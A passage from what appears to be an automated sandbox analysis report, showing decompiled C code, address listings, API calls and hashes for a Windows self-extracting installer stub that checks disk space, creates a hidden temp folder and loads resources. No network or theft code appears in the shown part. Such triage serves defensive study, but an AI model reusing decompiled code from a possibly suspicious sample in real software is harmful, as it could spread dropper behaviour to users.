										_t69 = E00A65467(0xa691e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0xa691e4;
											_t70 = E00A62630(0, 0xa691e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0xa691e4;
												_t71 = E00A65467(0xa691e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E00A6597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                      							if(_t35 != 0x5c) {
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								_t72 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								__eflags =  *0xa68b3f - _t35; // 0x0
                                                                                                                                                                                                      								_t72 = 0;
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									goto L10;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t101 = 0;
                                                                                                                                                                                                      							_t73 = E00A65467(0xa68b3e, 0, _t72);
                                                                                                                                                                                                      							__eflags = _t73;
                                                                                                                                                                                                      							if(_t73 != 0) {
                                                                                                                                                                                                      								L45:
                                                                                                                                                                                                      								_t38 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t101 = 0x4be;
                                                                                                                                                                                                      								E00A644B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L2;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t101 = 0x4b1;
                                                                                                                                                                                                      						E00A644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                      						 *0xa69124 = 0x80070714;
                                                                                                                                                                                                      						goto L2;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t101 = 0x4b5;
                                                                                                                                                                                                      					E00A644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					 *0xa69124 = E00A66285();
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					_t38 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L47:
                                                                                                                                                                                                      				return E00A66CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                      			}





































                                                                                                                                                                                                      0x00a65855
                                                                                                                                                                                                      0x00a6585a
                                                                                                                                                                                                      0x00a6585c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6585e
                                                                                                                                                                                                      0x00a6585e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6585e
                                                                                                                                                                                                      0x00a65811
                                                                                                                                                                                                      0x00a65817
                                                                                                                                                                                                      0x00a65819
                                                                                                                                                                                                      0x00a6581f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6581f
                                                                                                                                                                                                      0x00a65791
                                                                                                                                                                                                      0x00a65797
                                                                                                                                                                                                      0x00a6579c
                                                                                                                                                                                                      0x00a6579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a657a0
                                                                                                                                                                                                      0x00a657a9
                                                                                                                                                                                                      0x00a657ae
                                                                                                                                                                                                      0x00a657b0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a657b0
                                                                                                                                                                                                      0x00a6579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65769
                                                                                                                                                                                                      0x00a65762
                                                                                                                                                                                                      0x00a65753
                                                                                                                                                                                                      0x00a6574f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6572e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65864
                                                                                                                                                                                                      0x00a65864
                                                                                                                                                                                                      0x00a65864
                                                                                                                                                                                                      0x00a65717
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a656c3
                                                                                                                                                                                                      0x00a656c5
                                                                                                                                                                                                      0x00a656c9
                                                                                                                                                                                                      0x00a656ce
                                                                                                                                                                                                      0x00a656d0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a656d6
                                                                                                                                                                                                      0x00a656d6
                                                                                                                                                                                                      0x00a656d8
                                                                                                                                                                                                      0x00a656dd
                                                                                                                                                                                                      0x00a656df
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a656e1
                                                                                                                                                                                                      0x00a656e2
                                                                                                                                                                                                      0x00a656e4
                                                                                                                                                                                                      0x00a656e6
                                                                                                                                                                                                      0x00a656eb
                                                                                                                                                                                                      0x00a656ed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a656f3
                                                                                                                                                                                                      0x00a656f3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6586c
                                                                                                                                                                                                      0x00a65878
                                                                                                                                                                                                      0x00a6587e
                                                                                                                                                                                                      0x00a65882
                                                                                                                                                                                                      0x00a65883
                                                                                                                                                                                                      0x00a65889
                                                                                                                                                                                                      0x00a6588e
                                                                                                                                                                                                      0x00a6588e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65896
                                                                                                                                                                                                      0x00a656ed
                                                                                                                                                                                                      0x00a656df
                                                                                                                                                                                                      0x00a656d0
                                                                                                                                                                                                      0x00a656c1
                                                                                                                                                                                                      0x00a656a8
                                                                                                                                                                                                      0x00a6565b
                                                                                                                                                                                                      0x00a6565b
                                                                                                                                                                                                      0x00a6565d
                                                                                                                                                                                                      0x00a65669
                                                                                                                                                                                                      0x00a65669
                                                                                                                                                                                                      0x00a6565f
                                                                                                                                                                                                      0x00a6565f
                                                                                                                                                                                                      0x00a65665
                                                                                                                                                                                                      0x00a65667
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65667
                                                                                                                                                                                                      0x00a6566c
                                                                                                                                                                                                      0x00a65673
                                                                                                                                                                                                      0x00a65678
                                                                                                                                                                                                      0x00a6567a
                                                                                                                                                                                                      0x00a6589b
                                                                                                                                                                                                      0x00a6589b
                                                                                                                                                                                                      0x00a65680
                                                                                                                                                                                                      0x00a65685
                                                                                                                                                                                                      0x00a6568c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6568c
                                                                                                                                                                                                      0x00a6567a
                                                                                                                                                                                                      0x00a6560e
                                                                                                                                                                                                      0x00a65613
                                                                                                                                                                                                      0x00a6561a
                                                                                                                                                                                                      0x00a65620
                                                                                                                                                                                                      0x00a65626
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65626
                                                                                                                                                                                                      0x00a655db
                                                                                                                                                                                                      0x00a655e0
                                                                                                                                                                                                      0x00a655e7
                                                                                                                                                                                                      0x00a655f1
                                                                                                                                                                                                      0x00a655f6
                                                                                                                                                                                                      0x00a655f6
                                                                                                                                                                                                      0x00a655f6
                                                                                                                                                                                                      0x00a658b7
                                                                                                                                                                                                      0x00a658c7

APIs
  • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
  • Part of subcall function 00A6468F: SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
  • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
  • Part of subcall function 00A6468F: LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
  • Part of subcall function 00A6468F: LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
  • Part of subcall function 00A6468F: memcpy_s.MSVCRT ref: 00A646E5
  • Part of subcall function 00A6468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A655CF
• lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A65638
• LocalFree.KERNEL32(00000000), ref: 00A6564C
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A65620
  • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
  • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
  • Part of subcall function 00A66285: GetLastError.KERNEL32(00A65BBC), ref: 00A66285
• GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00A656B9
• GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A6571E
• GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A65737
• GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A657CD
• GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A657EF
• CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A65802
  • Part of subcall function 00A62630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A62654
• SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A65830
                                                                                                                                                                                                        • Part of subcall function 00A66517: FindResourceA.KERNEL32(00A60000,000007D6,00000005), ref: 00A6652A
                                                                                                                                                                                                        • Part of subcall function 00A66517: LoadResource.KERNEL32(00A60000,00000000,?,?,00A62EE8,00000000,00A619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A66538
                                                                                                                                                                                                        • Part of subcall function 00A66517: DialogBoxIndirectParamA.USER32(00A60000,00000000,00000547,00A619E0,00000000), ref: 00A66557
                                                                                                                                                                                                        • Part of subcall function 00A66517: FreeResource.KERNEL32(00000000,?,?,00A62EE8,00000000,00A619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A66560
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A65878
                                                                                                                                                                                                        • Part of subcall function 00A6597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A659A8
                                                                                                                                                                                                        • Part of subcall function 00A6597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A659AF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                      • API String ID: 2436801531-3896789798
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                                                                      			E00A6597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v788;
                                                                                                                                                                                                      				long _v792;
                                                                                                                                                                                                      				long _v796;
                                                                                                                                                                                                      				long _v800;
                                                                                                                                                                                                      				signed int _v804;
                                                                                                                                                                                                      				long _v808;
                                                                                                                                                                                                      				int _v812;
                                                                                                                                                                                                      				long _v816;
                                                                                                                                                                                                      				long _v820;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				signed int _t55;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                                      				signed int _t73;
                                                                                                                                                                                                      				signed short _t78;
                                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                                      				int _t102;
                                                                                                                                                                                                      				unsigned int _t103;
                                                                                                                                                                                                      				unsigned int _t105;
                                                                                                                                                                                                      				signed int _t111;
                                                                                                                                                                                                      				long _t112;
                                                                                                                                                                                                      				signed int _t116;
                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                      				signed int _t119;
                                                                                                                                                                                                      				signed int _t120;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t114 = __edi;
                                                                                                                                                                                                      				_t46 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                      				_v804 = __edx;
                                                                                                                                                                                                      				_t118 = __ecx;
                                                                                                                                                                                                      				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                      				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                      				if(_t50 != 0) {
                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                      					_v796 = 0;
                                                                                                                                                                                                      					_v792 = 0;
                                                                                                                                                                                                      					_v800 = 0;
                                                                                                                                                                                                      					_v808 = 0;
                                                                                                                                                                                                      					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                      					__eflags = _t55;
                                                                                                                                                                                                      					if(_t55 == 0) {
                                                                                                                                                                                                      						L29:
                                                                                                                                                                                                      						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                      						 *0xa69124 = E00A66285();
                                                                                                                                                                                                      						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                      						_t110 = 0x4b0;
                                                                                                                                                                                                      						L30:
                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                      						E00A644B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                      						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                      						L31:
                                                                                                                                                                                                      						_t66 = 0;
                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                      						L32:
                                                                                                                                                                                                      						_pop(_t114);
                                                                                                                                                                                                      						goto L33;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t69 = _v792 * _v796;
                                                                                                                                                                                                      					_v812 = _t69;
                                                                                                                                                                                                      					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                      					__eflags = _t116;
                                                                                                                                                                                                      					if(_t116 == 0) {
                                                                                                                                                                                                      						goto L29;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                      					__eflags = _t73;
                                                                                                                                                                                                      					if(_t73 != 0) {
                                                                                                                                                                                                      						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                      						_t101 =  &_v16;
                                                                                                                                                                                                      						_t111 = 6;
                                                                                                                                                                                                      						_t119 = _t118 - _t101;
                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                      							__eflags = _t22;
                                                                                                                                                                                                      							if(_t22 == 0) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                      							__eflags = _t87;
                                                                                                                                                                                                      							if(_t87 == 0) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *_t101 = _t87;
                                                                                                                                                                                                      							_t101 = _t101 + 1;
                                                                                                                                                                                                      							_t111 = _t111 - 1;
                                                                                                                                                                                                      							__eflags = _t111;
                                                                                                                                                                                                      							if(_t111 != 0) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t111;
                                                                                                                                                                                                      						if(_t111 == 0) {
                                                                                                                                                                                                      							_t101 = _t101 - 1;
                                                                                                                                                                                                      							__eflags = _t101;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *_t101 = 0;
                                                                                                                                                                                                      						_t112 = 0x200;
                                                                                                                                                                                                      						_t102 = _v812;
                                                                                                                                                                                                      						_t78 = 0;
                                                                                                                                                                                                      						_t118 = 8;
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							__eflags = _t102 - _t112;
                                                                                                                                                                                                      							if(_t102 == _t112) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t112 = _t112 + _t112;
                                                                                                                                                                                                      							_t78 = _t78 + 1;
                                                                                                                                                                                                      							__eflags = _t78 - _t118;
                                                                                                                                                                                                      							if(_t78 < _t118) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t78 - _t118;
                                                                                                                                                                                                      						if(_t78 != _t118) {
                                                                                                                                                                                                      							__eflags =  *0xa69a34 & 0x00000008;
                                                                                                                                                                                                      							if(( *0xa69a34 & 0x00000008) == 0) {
                                                                                                                                                                                                      								L20:
                                                                                                                                                                                                      								_t103 =  *0xa69a38; // 0x0
                                                                                                                                                                                                      								_t110 =  *((intOrPtr*)(0xa689e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                      								L21:
                                                                                                                                                                                                      								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                      								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                      									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                      									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                      										__eflags = _t103 - _t116;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags = _t110 - _t116;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                      									 *0xa69124 = 0;
                                                                                                                                                                                                      									_t66 = 1;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t66 = E00A6268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                      							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t105 =  *0xa69a38; // 0x0
                                                                                                                                                                                                      							_t110 =  *((intOrPtr*)(0xa689e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa689e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                      							_t103 = (_t105 >> 2) +  *0xa69a38;
                                                                                                                                                                                                      							goto L21;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t110 = 0x4c5;
                                                                                                                                                                                                      						E00A644B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						goto L31;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                      					 *0xa69124 = E00A66285();
                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                      					_t110 = 0x4f9;
                                                                                                                                                                                                      					goto L30;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t110 = 0x4bc;
                                                                                                                                                                                                      					E00A644B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					 *0xa69124 = E00A66285();
                                                                                                                                                                                                      					_t66 = 0;
                                                                                                                                                                                                      					L33:
                                                                                                                                                                                                      					return E00A66CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}



































                                                                                                                                                                                                      0x00a65ae6
                                                                                                                                                                                                      0x00a65ae6
                                                                                                                                                                                                      0x00a65ae9
                                                                                                                                                                                                      0x00a65aeb
                                                                                                                                                                                                      0x00a65af0
                                                                                                                                                                                                      0x00a65af6
                                                                                                                                                                                                      0x00a65af8
                                                                                                                                                                                                      0x00a65af9
                                                                                                                                                                                                      0x00a65af9
                                                                                                                                                                                                      0x00a65afb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65afd
                                                                                                                                                                                                      0x00a65aff
                                                                                                                                                                                                      0x00a65b00
                                                                                                                                                                                                      0x00a65b03
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65b03
                                                                                                                                                                                                      0x00a65b05
                                                                                                                                                                                                      0x00a65b08
                                                                                                                                                                                                      0x00a65b20
                                                                                                                                                                                                      0x00a65b27
                                                                                                                                                                                                      0x00a65b52
                                                                                                                                                                                                      0x00a65b52
                                                                                                                                                                                                      0x00a65b5b
                                                                                                                                                                                                      0x00a65b62
                                                                                                                                                                                                      0x00a65b6b
                                                                                                                                                                                                      0x00a65b6d
                                                                                                                                                                                                      0x00a65b76
                                                                                                                                                                                                      0x00a65b7d
                                                                                                                                                                                                      0x00a65b83
                                                                                                                                                                                                      0x00a65b7f
                                                                                                                                                                                                      0x00a65b7f
                                                                                                                                                                                                      0x00a65b7f
                                                                                                                                                                                                      0x00a65b6f
                                                                                                                                                                                                      0x00a65b72
                                                                                                                                                                                                      0x00a65b72
                                                                                                                                                                                                      0x00a65b85
                                                                                                                                                                                                      0x00a65b98
                                                                                                                                                                                                      0x00a65b9e
                                                                                                                                                                                                      0x00a65b87
                                                                                                                                                                                                      0x00a65b8f
                                                                                                                                                                                                      0x00a65b8f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65b85
                                                                                                                                                                                                      0x00a65b29
                                                                                                                                                                                                      0x00a65b33
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65b35
                                                                                                                                                                                                      0x00a65b48
                                                                                                                                                                                                      0x00a65b4a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65b4a
                                                                                                                                                                                                      0x00a65b0f
                                                                                                                                                                                                      0x00a65b16
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65b16
                                                                                                                                                                                                      0x00a65a7c
                                                                                                                                                                                                      0x00a65a8a
                                                                                                                                                                                                      0x00a65aa5
                                                                                                                                                                                                      0x00a65aab
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a659bb
                                                                                                                                                                                                      0x00a659c0
                                                                                                                                                                                                      0x00a659c7
                                                                                                                                                                                                      0x00a659d1
                                                                                                                                                                                                      0x00a659d6
                                                                                                                                                                                                      0x00a65c05
                                                                                                                                                                                                      0x00a65c14
                                                                                                                                                                                                      0x00a65c14

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A659A8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A659AF
                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A65A13
                                                                                                                                                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 00A65A40
                                                                                                                                                                                                      • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A65A64
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A65A7C
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A65A98
                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A65AA5
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A65BFC
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                        • Part of subcall function 00A66285: GetLastError.KERNEL32(00A65BBC), ref: 00A66285
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4237285672-0
                                                                                                                                                                                                      • Opcode ID: 4e9ab4f2d7bd1ee3ba27921042b7f22401f2d95489d666b9e6f9a7a2f9c3f8e1
                                                                                                                                                                                                      • Instruction ID: aa4074c722f6a3135c5889402529d4aa84b066a968c71517ee72a52a29a7717c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e9ab4f2d7bd1ee3ba27921042b7f22401f2d95489d666b9e6f9a7a2f9c3f8e1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE718EB1900608AFEB25DFB0CD89BFB77BCEB58340F1441A9F506D6140EA749E868F60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 374 a64fe0-a6501a call a6468f FindResourceA LoadResource LockResource 377 a65020-a65027 374->377 378 a65161-a65163 374->378 379 a65057-a6505e call a64efd 377->379 380 a65029-a65051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 a65060-a65077 call a644b9 379->383 384 a6507c-a650b4 379->384 380->379 388 a65107-a6510e 383->388 389 a650b6-a650da 384->389 390 a650e8-a65104 call a644b9 384->390 392 a65110-a65117 FreeResource 388->392 393 a6511d-a6511f 388->393 400 a65106 389->400 401 a650dc 389->401 390->400 392->393 396 a65121-a65127 393->396 397 a6513a-a65141 393->397 396->397 402 a65129-a65135 call a644b9 396->402 398 a65143-a6514a 397->398 399 a6515f 397->399 398->399 403 a6514c-a65159 SendMessageA 398->403 399->378 400->388 405 a650e3-a650e6 401->405 402->397 403->399 405->390 405->400
                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E00A64FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				struct HWND__* _t9;
                                                                                                                                                                                                      				int _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      				struct HWND__* _t27;
                                                                                                                                                                                                      				intOrPtr _t29;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				CHAR* _t36;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				intOrPtr _t47;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
